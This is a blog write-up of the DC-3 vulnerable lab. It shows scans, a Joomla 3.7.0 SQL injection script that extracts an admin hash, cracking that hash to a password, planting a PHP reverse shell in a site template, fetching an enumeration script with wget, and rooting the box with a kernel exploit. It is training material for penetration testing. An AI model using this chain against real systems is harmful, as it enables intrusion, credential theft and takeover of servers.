Posts DC-3 - WRITE-UP
Post
Cancel

DC-3 - WRITE-UP

MAIN INFORMATION

BOX NAME: DC: 3.2

DESCRIPTION

1
2
3
4
5
6
7
8
9
10
11
DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point, and no clues at all.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @ DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

For those with experience doing CTF and Boot2Root challenges, this probably won't take you long at all (in fact, it could take you less than 20 minutes easily).

If that's the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.

NMAP

1
2
3
4
5
6
7
8
9
10
11
12
13
nmap -p- -A -T4 192.168.56.116
Starting Nmap 7.80 (https://nmap.org) at 2020-06-08 08:22 EDT
Nmap scan report for 192.168.56.116
Host is up (0.0032s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80 / tcp open http Apache httpd 2.4.18 ((Ubuntu))
| _http-generator: Joomla! - Open Source Content Management
| _http-server-header: Apache / 2.4.18 (Ubuntu)
| _http-title: Home

Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 20.48 seconds

We see one open HTTP port. We were unable to get the Joomla version

GOBUSTER

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
$ gobuster dir -w /usr/share/wordlists/dirb/common.txt --url 192.168.56.116
================================================== =============
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
================================================== =============
[+] Url: http://192.168.56.116
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster / 3.0.1
[+] Timeout: 10s
================================================== =============
2020/06/08 08:26:56 Starting gobuster
================================================== =============
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/ administrator (Status: 301)
/ bin (Status: 301)
/ cache (Status: 301)
/ components (Status: 301)
/ includes (Status: 301)
/ language (Status: 301)
/ layouts (Status: 301)
/ libraries (Status: 301)
/ media (Status: 301)
/ modules (Status: 301)
/ images (Status: 301)
/ plugins (Status: 301)
/ server-status (Status: 403)
/ templates (Status: 301)
/ tmp (Status: 301)
/index.php (Status: 200)
================================================== =============
2020/06/08 08:26:57 Finished
================================================== =============

You can see a lot of directories that shouldn’t be visible, unfortunately, they don’t return any data. However, the directory /administrator is interesting

Imgur

I tried to do tests on SQL Injection using sqlmap. Unfortunately, neither in the address / administrator nor in /index.php were there any vulnerabilities associated with it. I also tried brute-force the login panel. It also didn’t work.

We are losing track. Wappalyzer plugin does not detect the Joomla version. Exploit is probably the only way right now, considering Box’s difficulty level. While browsing the internet, I came across the joomscan tool. It is not built into Kali Linux so we have to download it ourselves

JOOMSCAN

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
$ perl joomscan.pl --url http://192.168.56.116


(_ _) (_) (_) (\ /) / __) / __) / __ \ (\ ()
  .-_) () (_) () (_) () (\ __ \ ((__ / (__) \) (
  \ ____) (_____) (_____) (_ / \ / \ _) (___ / \ ___) (__) (__) (_) \ _)
(1337.today)

    - = [OWASP JoomScan
    + --- ++ --- == [Version: 0.0.7
    + --- ++ --- == [Update Date: [2018/09/23]
    + --- ++ --- == [Authors: Mohammad Reza Espargham, Ali Razmjoo
    - = [Code name: Self Challenge
    @OWASP_JoomScan, @rezesp, @ Ali_Razmjo0, @OWASP

Processing http://192.168.56.116 ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing:
http://192.168.56.116/administrator/components
http://192.168.56.116/administrator/modules
http://192.168.56.116/administrator/templates
http://192.168.56.116/images/banners


[+] Checking apache info / status files
[++] Readable info / status files are not found

[+] admin finder
[++] Admin page: http://192.168.56.116/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found



Your Report: reports / 192.168.56.116 /

The tool gives us information about the Joomly version, so let’s check on Google if there are any exploits for this version I come across:

JOOMBLAH

[GitHub exploit] (https://github.com/stefanlucas/Exploit-Joomla/blob/master/joomblah.py)

I perform:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
python joomblah.py http://192.168.56.116:80

    .---. .-'''-. .-'''-.
    | | '_ \' _ \ .---.
    '---' / / ''. \ / / ''. \ __ __ ___ / | | | .
    .--- .. | \ '. | \ '| | / `. ' '. || | | . '|
    | || '| '| '| '| .-. .-. '|| | | <|
    | | \ \ / / \ \ / / | | | | | ||| __ | | __ | |
    | | '. `.. '/`. `.. '/ | | | | | ||| / '__'. | | .: -. '. | | .''-.
    | | '-...-' ```-...- '' | | | | | ||: / `'. '| | / | \ | | | /. '' '. \
    | | | | | | | ||| | || | `" __ | | | / | |
    | | | __ | | __ | | __ ||| \ / '| | . '.' '| | | | | |
 __. ' '| /' .. '/' --- '/ / | | _ | | | |
| '' `'-'` \ \ ._, \' / | '. | '.
| ____. ' `- '` "' --- '' --- '

 [-] Fetching CSRF token
 [-] Testing SQLi
  - Found table: d8uea_users
  - Found table: users
  - Extracting users from d8uea_users
 [$] Found user ['629', 'admin', 'admin', 'freddy@norealaddress.net', '$ 2y $ 10 $ DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu', '', '']
  - Extracting sessions from d8uea_session
  - Extracting users from users
  - Extracting sessions from session

BREAKING HASH - JOHN THE RIPPER

So we have hash “$ 2y $ 10 $ DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu” for admin

I’m trying to break it with John the Ripper:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
$ john hash.txt --wordlist /usr/share/wordlists/rockyou.txt
Warning: only loading hashes of type "bcrypt", but also saw type "tripcode"
Use the "--format = tripcode" option to force loading hashes of that type instead
Warning: only loading hashes of type "bcrypt", but also saw type "descrypt"
Use the "--format = descrypt" option to force loading hashes of that type instead
Warning: only loading hashes of type "bcrypt", but also saw type "pix-md5"
Use the "--format = pix-md5" option to force loading hashes of that type instead
Warning: only loading hashes of type "bcrypt", but also saw type "mysql"
Use the "--format = mysql" option to force loading hashes of that type instead
Warning: only loading hashes of type "bcrypt", but also saw type "oracle"
Use the "--format = oracle" option to force loading hashes of that type instead
Warning: only loading hashes of type "bcrypt", but also saw type "Raw-SHA1"
Use the "--format = Raw-SHA1" option to force loading hashes of that type instead
pe instead
Warning: only loading hashes of type "bcrypt", but also saw type "bsdicrypt"
Use the "--format = bsdicrypt" option to force loading hashes of that type instead
Warning: only loading hashes of type "bcrypt", but also saw type "HMAC-SHA384"
Use the "--format = HMAC-SHA384" option to force loading hashes of that type instead
Warning: only loading hashes of type "bcrypt", but also saw type "oracle11"
Use the "--format = oracle11" option to force loading hashes of that type instead
Warning: only loading hashes of type "bcrypt", but also saw type "xsha"
Use the "--format = xsha" option to force loading hashes of that type instead
Warning: only loading hashes of type "bcrypt", but also saw type "lotus85"
Use the "--format = lotus85" option to force loading hashes of that type instead
Warning: only loading hashes of type "bcrypt", but also saw type "HAVAL-256-3"
Use the "--format = HAVAL-256-3" option to force loading hashes of that type instead
Warning: only loading hashes of type "bcrypt", but also saw type "plaintext"
Use the "--format = plaintext" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
snoopy (?)
1g 0: 00: 00: 01 DONE (2020-06-09 04:56) 0.6993g / s 25.17p / s 25.17c / s 25.17C / s a1b2c3..buster
Use the "--show" option to display all of the cracked passwords reliably
Session completed

So the password is “snoopy” When logged in, in the directory / administrator we see the following panel:

Imgur

REVERSE SHELL

How to get reverse shell now? Googling I came across a reverse shell injection method in the Joomla template. Do you remember the gobuster results? There was also a folder /templates in them. I come across this reverse shell example [PentestMonkey_Reverse-Shell] (https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php)

We are changing the content of index.phpfor the main template in this case (Protostar). Let’s remember to change ip to ours: P

Imgur

The next time you go to the main page, you get a reverse shell

I improve with “python -c” import pty; pty.spawn (‘/ bin / bash’) “

Nothing catches the eye, so I’m going to send the script LinEnum.shto the reverse shell.

I will do this with SimpleHTTPServer while I already have the script in the same directory.

1
$ python -m SimpleHTTPServer

On the reverse-shell, in the / tmp directory, I do a simple wget.

1
wget 192.168.56.103:8000/LinEnum.sh

EXPLOITATION

LINUX-EXPLOIT-SUGGESTOR

The script did not produce revealing results. There is another enumeration script called linux-exploit-suggestor

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
$ ./linux-exploit-suggester.sh

Available information:

Kernel version: 4.4.0
Architecture: i686
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_ *, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

74 kernel space exploits
45 user space exploits

Possible Exploits:

cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian = 7 | 8, RHEL = 5 | 6 | 7, ubuntu = 14.04 | 12.04, ubuntu = 10.04 {kernel: 2.6.32-21-generic}, [ubuntu = 16.04 {kernel: 4.4.0-21- generic}]
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847.cpp
   Comments: For RHEL / CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian = 9.0 {kernel: 4.9.0-3-amd64}, fedora = 25 | 26 | 27, ubuntu = 14.04 {kernel: 4.4.0-89-generic}, [ubuntu = (16.04 | 17.04)] { kernel: 4. (8 | 10) .0- (19 | 28 | 45) -generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled! = 1

[+] [CVE-2016-8655] chocobo_root

   Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
   Exposure: highly probable
   Tags: [ubuntu = (14.04 | 16.04) {kernel: 4.4.0- (21 | 22 | 24 | 28 | 31 | 34 | 36 | 38 | 42 | 43 | 45 | 47 | 51) -generic}]
   Download URL: https://www.exploit-db.com/download/40871
   Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS = y needs to be enabled

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian = 7 | 8, RHEL = 5 {kernel: 2.6. (18 | 24 | 33) - *}, RHEL = 6 {kernel: 2.6.32- * | 3. (0 | 2 | 6 | 8 | 10). * | 2.6.33.9-rt31}, RHEL = 7 {kernel: 3.10.0- * | 4.2.0-0.21.el7}, [ubuntu = 04/16 | 04/14 | 04/12]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL / CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-4557] double-fdput ()

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
   Exposure: highly probable
   Tags: [ubuntu = 16.04 {kernel: 4.4.0-21-generic}]
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled! = 1

[+] [CVE-2017-7308] af_packet

   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Exposure: probable
   Tags: [ubuntu = 04/16] {kernel: 4.8.0- (34 | 36 | 39 | 41 | 42 | 44 | 45) -generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS = y needed. Modified version at 'ext-url' adds support for additional kernels

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: probable
   Tags: [ubuntu = (14/04 | 16/04)] {kernel: 4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONF
   IG_IP_DCCP enabled. Includes partial SMEP / SMAP bypass

[+] [CVE-2017-1000112] NETIF_F_UFO

   Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
   Exposure: probable
   Tags: ubuntu = 14.04 {kernel: 4.4.0 - *}, [ubuntu = 16.04] {kernel: 4.8.0- *}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
   Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS = y needed. SMEP / KASLR bypass included. Modified version at 'ext-url' adds support for additional distros / kernels

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint = 19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

I tried a few of them, but the double-fdput () exploit only worked.

We repeat the methodology of sending files to the remote-shell

We follow the instructions here PROJECT-ZERO

After executing the exploit, we can see from the idcommand that we have root. I leave the flag for myself, for motivation to make this Box myself later :P

This post is licensed under CC BY 4.0 by the author.